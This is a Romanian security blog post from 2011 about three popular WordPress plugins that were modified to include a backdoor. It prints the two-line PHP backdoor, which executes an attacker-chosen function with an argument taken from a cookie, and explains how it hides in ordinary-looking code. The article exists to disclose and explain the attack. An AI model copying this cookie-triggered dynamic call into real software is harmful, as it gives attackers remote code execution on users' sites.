• Acasă
  • Despre noi
  • Autori
  • Mărturii
  • Arhivă
  • Trimite Articol
  • Contact

WORLDIT

Lumea în 1 și 0.

  • Știri
    • Tehnologie
    • Tehnologie mobilă
    • Securitate
    • Developers
    • Știință
    • Benzi desenate
    • Jocuri
    • Intern
  • Tehnic
    • Browser
    • C#
    • C/C++
    • Challenge
    • HTML/CSS
    • Javascript, Ajax, jQuery
    • Open Source
    • PHP
    • Python
    • Securitate IT
    • Socializare
    • WordPress
    • Altele
  • Recenzii
  • Interviuri
  • Evenimente

Extensiile WordPress au fost modificate neautorizat – cum arată backdoor-ul?

0
  • Publicat de Andrei Avădănei
  • în Securitate IT · Tehnic
  • — 23 iun., 2011 at 11:36 am

În urmă cu câteva zile, trei dintre cele mai populare extensii WordPress (AddThis, WPTouch şi W3 Total Cache) au realizat o sincronizare în depozitul pluginurilor prin care adăugau un backdoor maliţios. Asta a forţat WordPress.org să reseteze toate parolele ca o precauţie. Reacţia celor de la WordPress a fost de nota 10, incidentul fiind aplanat în scurt timp iar extensiile WordPress fiind izolate cu succes.

Din păcate, evenimentul nu se termină aici iar curiozitatea ne împinge mai departe de unde dorim să vedem cum arată backdoorul descoperit de WordPress. Oficialii WordPress susţin că au remarcat câteva sincronizări ale depozitului suspicioase care aveau în conţinut backdoor-uri mascate inteligent. Să vedem cât de bine ascunse erau.

 if (preg_match("#useragent/([^/]*)/([^/]*)/#i", $_COOKIE[$key], $matches) && $matches[1]($matches[2]))  
                $this->desired_view = $matches[1].$matches[2]; 

Aparent, codul nu spune prea multe lucruri care să creeze suspiciuni. Cineva care navighează prin cod nu va sesiza intenţia maliţioasă a celor două linii de cod. Totuşi, dacă analizăm cu atenţie, remarcăm că se verifică existenţa unei anumite variabile COOKIE iar dacă aceasta există, parsează conţinutul în variabila $matches, după care execută codul apelând $matches[1]($matches[2]) ce poate fi orice funcţii cu orice parametri. Cineva ar putea apela astfel funcţia eval, system sau chiar exec, permiţându-i rularea oricărei comenzi pe site-ul utilizatorului.

Acest anunţ ridică mai multe semnale de alarmă. Pe lângă faptul că trebuie să ne asigurăm că ultimile actualizări ale extensiilor nu au afectat cu nimic securitatea blogurilor noastre, trebuie să luăm lucrurile mai preventiv chiar şi atunci când e vorba de actualizări ale extensiilor. Riscul ca un dezvoltator al unei extensii care este instalată şi pe blogul dumneavoastră să fie compromis sunt foarte mari, mai ales atunci când sunteţi sigur că aveţi „prieteni” care nu-s aşa de încântaţi de prezenţa dumneavoastră în online.

Etichete: audit de securitatebackdoorhackingsecuritateWordpresswordpress.org

— Andrei Avădănei a scris 1246 articole

Andrei scrie pe worldit.info din vara lui 2011. Este fondatorul Asociatiei Centrul de Cercetare in Securitate Informatica din Romania - CCSIR si coordoneaza DefCamp, cea mai importanta conferinta de securitate informatica & hacking din Europa Centrala si de Est. Andrei ofera in cadrul Bit Sentinel servicii de securitate informatica, penetration testing, security management, recuperarea de pe urma unui atac cibernetic, training-uri si workshop-uri.

  • Articolul anterior Ce se întâmplă pe Internet în 60 de secunde?
  • Articolul următor Nou sistem de securitate pentru Sony Playstation Network

  • Facebook

    WorldIT.info
  • Ultimele Atacuri Cibernetice din Romania – RO Hacked

    [wp_rss_retriever url="https://rohacked.bit-sentinel.com/feed/" excerpt="none" items="5" read_more="false" new_window="true" thumbnail="false" cache="0"] RO Hacked este registrul atacurilor cibernetice din România.
  • Caută

  • Articole Recomandate

    • Recent Posts
    • Tags
    • Număr record de participanți la DefCamp 2015, cel mai important eveniment dedicat securității cibernetice din Europe Centrala si de Estdecembrie 2, 2015
    • La DefCamp 2015 vei afla prin ce tehnici pot fi evitate măsurile de securitate ale sistemelor informatice criticeoctombrie 16, 2015
    • Ultima sansa sa rezervi bilete de tip Early Bird la DefCamp 2015septembrie 1, 2015
    • 15 sfaturi despre cum poti deveni un programator bun venite de la specialisti romaniaugust 4, 2015
    • algoritmica Android antivirus Apple Avadanei Andrei benzi desenate BitDefender blog browser C++ Chrome concurs eveniment Facebook Firefox Google google chrome hacking html5 infografic informatica internet Internet Explorer IT javascript linux Microsoft Mozilla Firefox online PHP programare retea sociala review Romania securitate Tehnologie Twitter web Windows Windows 7 Wordpress WorldIT worldit.info Yahoo! YouTube
  • mai 2022
    L Ma Mi J V S D
     1
    2345678
    9101112131415
    16171819202122
    23242526272829
    3031  
    « dec.    
  • Link-uri Sponsorizate

    • laptop second hand

    • Calculatoare Second Hand

    • cod voucher pc garage

  • Home
  • Tehnic
  • Securitate IT
  • Extensiile WordPress au fost modificate neautorizat – cum arată backdoor-ul?
  • Important

    • Bit Sentinel
    • Centrul de Cercetare în Securitate Informatică din România
    • DefCamp
  • Prieteni

    • BetiT.ro
    • bijuterii handmade
    • Computerica | Resurse gratuite PC
    • Descopera.org
    • Gadgeturi si IT – Giz.ro
  • Prieteni

    • PC – Config
    • RO Hacked
    • Stiri IT

Copyright © 2009-2014 WORLDIT. Toate drepturile Rezervate.
Termeni și condiții | Contact | Licența Creative Commons